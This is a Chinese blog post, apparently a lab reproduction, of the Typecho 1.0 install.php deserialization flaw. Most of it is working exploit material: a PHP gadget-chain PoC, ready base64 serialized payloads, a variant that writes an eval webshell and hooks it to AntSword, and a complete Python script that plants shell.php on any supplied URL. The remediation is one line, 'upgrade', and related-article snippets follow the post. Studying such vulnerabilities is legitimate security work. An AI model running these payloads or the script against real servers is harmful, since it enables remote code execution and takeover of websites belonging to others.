typecho_1.0_14.10.10_unserialize

最新推荐文章于 2023-09-10 14:28:51 发布
最新推荐文章于 2023-09-10 14:28:51 发布
阅读量719 收藏 2
点赞数 1
分类专栏: 反序列化 typecho 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886198/article/details/111474906
版权

typecho_1.0_14.10.10_unserialize

漏洞描述

typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。

漏洞危害等级

高危

影响版本

typecho1.0(14.10.10)

漏洞复现

基础环境
组件版本
OSWin10
WebserverMAMP PRO _PHP5.6.37
typecho1.0(14.10.10)
  • 网站安装

  • 需要进入数据库创建一个typecho_10数据库,否则无法安装。

在这里插入图片描述
在这里插入图片描述

  • 安装成功

在这里插入图片描述

漏洞演示
  • 准备poc
<?php
class Typecho_Feed 
{ 
	const RSS1 = 'RSS 1.0'; 
	const RSS2 = 'RSS 2.0'; 
	const ATOM1 = 'ATOM 1.0'; 
	const DATE_RFC822 = 'r'; 
	const DATE_W3CDTF = 'c'; 
	const EOL = "\n"; 
	private $_type; 
	private $_items; 
	
	public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
    	'title' => '1', 
    	'link' => '1', 
    	'date' => 1508895132, 
    	'category' => array(new Typecho_Request()), 
    	'author' => new Typecho_Request(), 
    	); 
  	} 
} 
class Typecho_Request 
{ 
	private $_params = array(); 
	private $_filter = array(); 
	public function __construct(){ 
	$this->_params['screenName'] = 'phpinfo()';    //替换phpinfo()这里进行深度利用
	$this->_filter[0] = 'assert'; 
	} 
} 

$exp = array( 
	'adapter' => new Typecho_Feed(), 
	'prefix' => 'typecho_' 
); 

echo base64_encode(serialize($exp));
?>
  • 生成利用代码,构造POST数据
php typecho_1.0_POC.php                   //执行POC生成代码

```
YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
```
    
···__typecho_config=
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=   
    
···

在这里插入图片描述

  • 提交url,成功执行phpinfo();
/install.php?finish=

在这里插入图片描述

深度利用
  • 写shell
$this->_params['screenName'] = 'fputs(fopen(\'shell.php\',\'w\'),\'<?=@eval($_REQUEST[buzhidao])?>\')';
  • 构造POST数据,提交POST数据,会在当前目录生成shell.php文件
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjYzOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywndycpLCc8Pz1AZXZhbCgkX1JFUVVFU1RbYnV6aGlkYW9dKT8+JykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo2MzoiZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD89QGV2YWwoJF9SRVFVRVNUW2J1emhpZGFvXSk/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==
  • 使用火狐浏览器,Edge浏览器没有成功,可能使hackbar问题。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-62ZXRQOh-1608533429707)(d:\Desktop\千峰网络安全2001期.md\image\反序列化\typecho_1.0_14.10\7)]

  • 蚁剑进行连接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DwdiDh76-1608533429710)(d:\Desktop\千峰网络安全2001期.md\image\反序列化\typecho_1.0_14.10\8)]

python自动化

python3 TypechoV10_GetShell.py http://10.10.10.213/typechov10/ 

http://10.10.10.213/typechov10/ 
[+] install.php exist! 
[+] Shell.php write success! 
Shell path : http://10.10.10.213/typechov10/shell.php

import requests 
import sys 
url = sys.argv[1] path = "/install.php?finish=" print(url) 
payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU4OiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywndycpLCc8Pz1AZXZhbCgkX1JFUVVFU1RbNzc3XSk/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTg6ImZwdXRzKGZvcGVuKCdzaGVsbC5waHAnLCd3JyksJzw/PUBldmFsKCRfUkVRVUVTVFs3NzddKT8+JykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9" 
postData = {"__typecho_config":payload} 
header ={ 
	"Referer":url, 
	"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"} 
	
res = requests.get(url+path) 
if res.status_code == 200: 
	print("[+] install.php exist!") 
else: 
	print("[-] install.php not exist") 
	sys.exit() 
	
res = requests.post(url = url+path,data = postData,headers = header) 
res = requests.get(url+"shell.php") 
if res.status_code == 200: 
	print("[+] Shell.php write success!") 
	print("Shell path :",url+"shell.php") 
else: 
	print("[-] GetShell Error!")

漏洞修复

升级版本
暮光烛日
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 570
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
typecho1.0.14.10.10
10-30
typecho,typecho源码,typecho1.0下载
typecho_14.10.10反序列化漏洞复现
acdcccc的博客
09-05 86
typecho_14.10.10反序列化漏洞复现
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 412
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
CVE-2018-18753 Typecho 反序列化漏洞 分析复现
2301_77512689的博客
04-21 379
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
Typecho 反序列化漏洞导致前台 getshell
weixin_38920945的博客
11-17 231
前言最早知道这个漏洞是在一个微信群里,说是install.php文件里面有个后门,看到别人给的截图一看就知道是个PHP反序列化漏洞,赶紧上服务器看了看自己的博客,发现自己也中招了,相关代码如下:然后果断在文件第一行加上了die:<?phpdie('404NotFound!');?>今天下午刚好空闲下来,就赶紧拿出来代码看看。漏洞分析先从install.ph...
Leisure-master.zip_QBB_leisure_typecho_typecho master
09-24
typecho主题 Leisure主题
Contribute_typecho_源码.zip
10-18
Contribute_typecho_源码.zip
Typecho_Admin_Theme:Typecho博客后台主题
05-30
一、主题介绍 v1.0  1.为什么叫Purple?  此套主题基于修改适配!之前我看过很多模板,后台主题适配过几套(都没完成,直接删除),到最后我还是最喜欢Purple的风格、布局、配色......想个名字也难,不如第一代就...
clean-home.zip_Home Home_typecho
09-23
Typecho Theme, Typecho主题, Clean Home
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1921
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
记一次typecho反序列化漏洞的复现(第一次写poc版)
m0_62100902的博客
06-28 1137
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
php反序列化漏洞cms,OkayCMS 2.3.4 反序列化漏洞(CVE-2019-16885)
weixin_42510608的博客
03-11 357
漏洞概述OKAYCMS是一款来自俄罗斯的功能强大的在线商店管理系统。OKAYCMS易于定制的多种语言自适应模板可用于销售任何商品:从服装、建筑材料、手机到音乐曲目,视频课程,有声读物和海报等。在OKAYCMS v2.3.4中存在着一处反序列化漏洞。未经身份验证的攻击者可以通过此处漏洞进行进一步的攻击利用。漏洞细节漏洞位置存在于view/ProductsView.php与api/Comparison...
typecho反序列化漏洞复现
weixin_71090536的博客
09-05 252
通俗解释如下代码为:call_user_func()函数 调用 assert() 函数,将 "phpinfo()" 这个参数给到 assert() 函数中,下方代码也可写为:assert("phpinfo()");3. 在访问 typecho_1.0(14.10.10)_unserialize_phpinfo.php 页面时,找到 base64 编码的字符串。call_user_func():回调函数,是危险函数,可利用其构造后门。cookie:__typecho_config=恶意代码字段。
ThinkPHP6.x反序列化POC
Armandhe的博客
04-06 718
ThinkPHP6.x反序列化POC
2018领航杯awd简单复现
plant1234的博客
12-19 3587
首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: 这里能cat flag 修补增加过滤或者删除漏洞 2级的fwrite审计: 利用seay工具进行代码审计: 源码: 可以发现这是一个日志记录,但是它把记录的日志都写入到了 /var/www/html/log.php文件,这就造成文件写入漏洞 我们利用这个log1.php用get的方式写一个<?
php仿制网站,如何仿制网站(一模一样),制造后台管理系统CMS
weixin_30624185的博客
03-10 1714
如何仿制网站(一模一样),制造后台管理系统CMS2020 - 9 - 5 TAG :首先去找一个软件,大致是:网站整站下载工具,这个软件可以把网站所有的HTML页面下载下来,这个时候我们就得到了静态的HTML模版,自己把下载的模板整理下,因为一般下载的都很乱,把各个栏目的模板整理出来。接着:本地安装PHP运行环境,不会搭建环境的话,你百度搜索一下这个软件:PHP集成环境 类似的集成环境包有很多种,...
typecho_1.0_14.10.10_反序列化_漏洞
最新发布
weixin_42786460的博客
09-10 173
typecho_1.0_14.10.10_反序列化_漏洞
debian安装typecho
04-29
要在Debian上安装Typecho,可以按照以下步骤操作: 1. 安装 LAMP 环境 在 Debian 上安装 Apache、MySQL 和 PHP,可以使用以下命令: ``` sudo apt-get update sudo apt-get install apache2 mysql-server php php-mysql libapache2-mod-php ``` 2. 下载 Typecho 从 Typecho 官方网站 https://typecho.org/download 下载最新版 Typecho 的 ZIP 文件,然后将其解压到网站根目录下的一个子目录中,例如 /var/www/html/typecho。 3. 配置数据库 创建一个新的 MySQL 数据库和用户,然后将权限授予该用户。可以使用以下命令: ``` sudo mysql -u root -p CREATE DATABASE typecho; GRANT ALL PRIVILEGES ON typecho.* TO 'typecho_user'@'localhost' IDENTIFIED BY 'password'; FLUSH PRIVILEGES; exit; ``` 请将 'typecho_user' 和 'password' 替换为您自己的用户名和密码。 4. 配置 Typecho 将 Typecho 根目录下的文件 config.sample.php 复制一份并将其重命名为 config.inc.php。然后编辑该文件,将以下行更改为适当的值: ``` /** 数据库的地址 */ define('__TYPECHO_DB_HOST__', 'localhost'); /** 数据库的用户名 */ define('__TYPECHO_DB_USER__', 'typecho_user'); /** 数据库的密码 */ define('__TYPECHO_DB_PASSWORD__', 'password'); /** 数据库的名称 */ define('__TYPECHO_DB_NAME__', 'typecho'); ``` 请将 'typecho_user' 和 'password' 替换为之前创建的用户名和密码。 5. 配置 Apache 在 Apache 配置中创建一个新的虚拟主机,并将其指向 Typecho 的目录。可以使用以下命令: ``` sudo nano /etc/apache2/sites-available/typecho.conf ``` 然后将以下内容添加到文件中: ``` <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html/typecho ServerName yourdomain.com <Directory /var/www/html/typecho> Options FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/typecho_error.log CustomLog ${APACHE_LOG_DIR}/typecho_access.log combined </VirtualHost> ``` 请将 'yourdomain.com' 替换为您自己的域名,并将 DocumentRoot 和 Directory 路径更改为您的 Typecho 目录的路径。 6. 启用虚拟主机 启用新创建的虚拟主机并重新启动 Apache 服务: ``` sudo a2ensite typecho.conf sudo systemctl restart apache2 ``` 7. 安装 Typecho 在浏览器中访问您的域名,您将看到 Typecho 的安装向导。按照指示进行操作,输入数据库信息和管理员帐户信息。 安装完成后,您可以在浏览器中访问 Typecho 后台管理页面。 以上就是在 Debian 上安装 Typecho 的步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值